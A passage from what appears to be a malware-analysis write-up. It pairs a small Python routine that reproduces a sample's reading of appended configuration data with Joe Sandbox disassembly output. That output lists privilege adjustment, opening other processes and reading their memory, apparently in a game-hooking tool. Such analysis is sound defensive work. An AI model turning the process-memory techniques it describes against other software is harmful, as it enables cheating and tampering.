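    """Mirror CreateFileA / GetFileSize / SetFilePointer(FILE_END) / ReadFile:
    open read-only, seek `length` bytes back from the end, read `length` bytes.
    Returns (file_size, tail_bytes). A file shorter than `length` is read from
    offset 0, which is where a rejected negative seek would leave the pointer."""
    with open(path, "rb") as fh:
        size = os.fstat(fh.fileno()).st_size
        start = max(0, size - length)
        fh.seek(start, os.SEEK_SET)
        return size, fh.read(length)


def find_marker(tail, marker):
    """Offset of `marker` inside the tail buffer, or -1 if absent."""
    return tail.find(marker)


def build_sample(path, body_len, appended):
    """Constructed test file: `body_len` filler bytes followed by an appended blob.
    Stands in for a binary that carries data after its PE image."""
    with open(path, "wb") as fh:
        fh.write(b"\x90" * body_len)
        fh.write(appended)
    return path


def demo(body_len, appended, marker=b"CFG:"):
    """Build a constructed file, read its tail the way the sample does and
    report (file_size, bytes_read, marker_offset_in_tail)."""
    with tempfile.TemporaryDirectory() as tmp:
        path = build_sample(os.path.join(tmp, "sample.bin"), body_len, appended)
        size, tail = read_tail(path)
        return size, len(tail), find_marker(tail, marker)


if __name__ == "__main__":
    # Constructed input: 5000 filler bytes, then a 37-byte appended blob.
    print(demo(5000, b"CFG:" + b"http://example.invalid/" + b"\x00" * 10))
```

The marker offset is relative to the 2000-byte window, not to the file; add `size - 2000` to map it back to a file offset when the file is at least that long.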
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D906B
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D90A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead
                                                                                  • String ID: 2$C$G$M$W$a$e$o
                                                                                  • API String ID: 3726627124-81443989
                                                                                  • Opcode ID: 7f02cc5938924e8ac09ebe50bf751a5e9a1119cc796d479bba3fd49836409ba3
                                                                                  • Instruction ID: 40e250ea83cb8e0b1ed884084c77051126e1b2784a73bdfc5e8236a3b8d8313d
                                                                                  • Opcode Fuzzy Hash: 7f02cc5938924e8ac09ebe50bf751a5e9a1119cc796d479bba3fd49836409ba3
                                                                                  • Instruction Fuzzy Hash: 4A31A37250D3C09ED341DF688484A9FBFE2ABDA20CF48495DF0D897252D666C609CB67
                                                                                  APIs
                                                                                    • Part of subcall function 6A6EE09C: _malloc.LIBCMT ref: 6A6EE0BA
                                                                                  • _memset.LIBCMT ref: 6A6D16B9
                                                                                  • _strncpy.LIBCMT ref: 6A6D16F0
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D1704
                                                                                  • OutputDebugStringA.KERNEL32(AddGameDllInfoToList,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6A6D171E
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6A6D1725
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D1743
                                                                                  • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6A6D1753
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6A6D175A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s$_malloc_memset_strncpy
                                                                                  • String ID: AddGameDllInfoToList$C:\pl.txt
                                                                                  • API String ID: 235111189-3547190053
                                                                                  • Opcode ID: 526ed89c7b615073ce491fb292c0632d77df273c7c2f865f091ead472dc567af
                                                                                  • Instruction ID: dd063adc3529347b83eec3911e2908c73e8da33b16fa0a380b8591eeb9cc7024
                                                                                  • Opcode Fuzzy Hash: 526ed89c7b615073ce491fb292c0632d77df273c7c2f865f091ead472dc567af
                                                                                  • Instruction Fuzzy Hash: 37219FB1508301ABE704DFA4CD84E6AB7F5BBDA254F094929F65893301DF34E908CBA6
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32), ref: 6A6EEE1F
                                                                                  • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 6A6EEE3C
                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6A6EEE49
                                                                                  • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6A6EEE56
                                                                                  • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6A6EEE63
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                  • API String ID: 667068680-3617302793
                                                                                  • Opcode ID: f2321e8e495ae5295914db63e195f7cdba34c159f6a9187396fb36d97fc64270
                                                                                  • Instruction ID: 0f1aa0d23139c3b8004b0453373dcbba2a376a10fd965c43fb1737ce28ed9b08
                                                                                  • Opcode Fuzzy Hash: f2321e8e495ae5295914db63e195f7cdba34c159f6a9187396fb36d97fc64270
                                                                                  • Instruction Fuzzy Hash: 1711D072909645FFDB30AF99C984819BEF8B76B31A30544BEE604D7110EF70AD448E55
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • _memset.LIBCMT ref: 6A6D991B
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D9949
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D9978
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead_memset
• String ID: I$N$P$U$e$w$y
• API String ID: 3693474235-4183856720
APIs
• GetModuleHandleA.KERNEL32(KERNEL32,6A6F30D6,?,?), ref: 6A6F2FCA
• GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6A6F2FEB
• GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6A6F2FFD
• GetProcAddress.KERNEL32(ActivateActCtx), ref: 6A6F300F
• GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6A6F3021
  • Part of subcall function 6A6EE232: __CxxThrowException@8.LIBCMT ref: 6A6EE248
  • Part of subcall function 6A6EE232: __EH_prolog3.LIBCMT ref: 6A6EE255
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
• String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
• API String ID: 417325364-2424895508
APIs
• EnterCriticalSection.KERNEL32(6A72CFE8,?,?,00000000,6A72CFCC,6A72CFCC,?,6A6F4011,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3BCE
• GlobalAlloc.KERNEL32(00000002,00000000,?,00000000,6A72CFCC,6A72CFCC,?,6A6F4011,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3C24
• GlobalHandle.KERNEL32(07D54248), ref: 6A6F3C2D
• GlobalUnlock.KERNEL32(00000000), ref: 6A6F3C37
• GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 6A6F3C50
• GlobalHandle.KERNEL32(07D54248), ref: 6A6F3C62
• GlobalLock.KERNEL32(00000000), ref: 6A6F3C69
• LeaveCriticalSection.KERNEL32(?,?,00000000,6A72CFCC,6A72CFCC,?,6A6F4011,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3C72
• GlobalLock.KERNEL32(00000000), ref: 6A6F3C7E
• _memset.LIBCMT ref: 6A6F3C98
• LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000001,?,?,?,?,?,?,?,?), ref: 6A6F3CC6
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
• String ID:
• API String ID: 496899490-0
APIs
Strings
• C:\pl.txt, xrefs: 6A6D1A96
• SetSettingsInfo : guaVer : %d, bFree : %d, guanWang : %s, verNum : %s, hotkeyFlag : %d, hookFlag : %d, funcFlag : %d, xrefs: 6A6D1A82
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: DebugOutputString_strncpy$__wfopen_s_memset_sprintf
• String ID: C:\pl.txt$SetSettingsInfo : guaVer : %d, bFree : %d, guanWang : %s, verNum : %s, hotkeyFlag : %d, hookFlag : %d, funcFlag : %d
• API String ID: 477743007-1446027646
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,6A6D6513), ref: 6A6D5815
• GetFileSize.KERNEL32(00000000,00000000,?,6A6D6513), ref: 6A6D5825
• CloseHandle.KERNEL32(00000000,?,6A6D6513), ref: 6A6D5833
• _malloc.LIBCMT ref: 6A6D5844
• CloseHandle.KERNEL32(00000000,6A6D6513), ref: 6A6D5853
• _memset.LIBCMT ref: 6A6D5867
• ReadFile.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,?,6A6D6513), ref: 6A6D587D
• CloseHandle.KERNEL32(00000000,?,?,?,6A6D6513), ref: 6A6D5884
  • Part of subcall function 6A6FE26F: __lock.LIBCMT ref: 6A6FE28D
  • Part of subcall function 6A6FE26F: ___sbh_find_block.LIBCMT ref: 6A6FE298
  • Part of subcall function 6A6FE26F: ___sbh_free_block.LIBCMT ref: 6A6FE2A7
  • Part of subcall function 6A6FE26F: HeapFree.KERNEL32(00000000,?,6A726890,0000000C,6A705ECE,00000000,6A726C18,0000000C,6A705F08,?,?,?,6A70F988,00000004,6A726F98,0000000C), ref: 6A6FE2D7
  • Part of subcall function 6A6FE26F: GetLastError.KERNEL32(?,6A70F988,00000004,6A726F98,0000000C,6A706FD8,?,?,00000000,00000000,00000000,?,6A705835,00000001,00000214), ref: 6A6FE2E8
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: CloseFileHandle$CreateErrorFreeHeapLastReadSize___sbh_find_block___sbh_free_block__lock_malloc_memset
• String ID: PEC2
• API String ID: 357344292-2409353939
APIs
• _memset.LIBCMT ref: 6A6D8218
  • Part of subcall function 6A6E0470: GetModuleHandleA.KERNEL32 ref: 6A6E052A
  • Part of subcall function 6A6E0470: GetProcAddress.KERNEL32(00000000), ref: 6A6E0531
  • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?), ref: 6A6D825A
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?), ref: 6A6D826E
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 6A6D827F
• _malloc.LIBCMT ref: 6A6D828B
• _memset.LIBCMT ref: 6A6D829D
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 6A6D82AF
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6A6D82B6
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: FileHandle_memset$Close$AddressCreateModuleProcReadSize_malloc
• String ID: A3M2
• API String ID: 2428753672-2848054085
APIs
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0BE932C0
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0BE932E4
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0BE93300
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 0BE93321
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0BE9334A
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 0BE93358
• GetStdHandle.KERNEL32(000000F5), ref: 0BE93393
• GetFileType.KERNEL32(?,000000F5), ref: 0BE933A9
• CloseHandle.KERNEL32(?,?,000000F5), ref: 0BE933C4
• GetLastError.KERNEL32(000000F5), ref: 0BE933DC
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                  • String ID:
                                                                                  • API String ID: 1694776339-0
                                                                                  • Opcode ID: 9ab876b33e95a7d9fa5d29434460b8d33dada4bf2aa3fe7fe3f356c4207dd06d
                                                                                  • Instruction ID: ff37a39894772ebe23f28595c63a601a27c08699f6a60e025304e5a4c6296b35
                                                                                  • Opcode Fuzzy Hash: 9ab876b33e95a7d9fa5d29434460b8d33dada4bf2aa3fe7fe3f356c4207dd06d
                                                                                  • Instruction Fuzzy Hash: D641D230644701EAEF30EF24F80976676E5EB00B55F20AE29D4B6D75E0EA61A85C8749
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • _memset.LIBCMT ref: 6A6D86C5
                                                                                  • ReadProcessMemory.KERNEL32(00000000,00530000,?,00040000,?,?,00000000,0003FFFF,6A6DA314,?), ref: 6A6D86E8
                                                                                  • ReadProcessMemory.KERNEL32(00000000,005B0000,?,00040000,?), ref: 6A6D87D7
                                                                                  • ReadProcessMemory.KERNEL32(00000000,00510000,?,00040000,?), ref: 6A6D88C4
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D89A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$Process$ReadVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilege_memset
                                                                                  • String ID: 8$E$}
                                                                                  • API String ID: 1110381803-3509493567
                                                                                  • Opcode ID: 4bdc23592b5c6a724dcb95a148795c1c9ffa620f0cea615cc4a495ce547eaf1e
                                                                                  • Instruction ID: 359779cc469a048a5d418ae401a3814bbf4f73f98f34c0777566d39d382167fc
                                                                                  • Opcode Fuzzy Hash: 4bdc23592b5c6a724dcb95a148795c1c9ffa620f0cea615cc4a495ce547eaf1e
                                                                                  • Instruction Fuzzy Hash: BAA1C52104D3C199D362D63D489878FBED15FFB258F881B8DF1E4572E2C6658609C36B
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(00000000,00000000), ref: 6A6DDE01
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 6A6DDE07
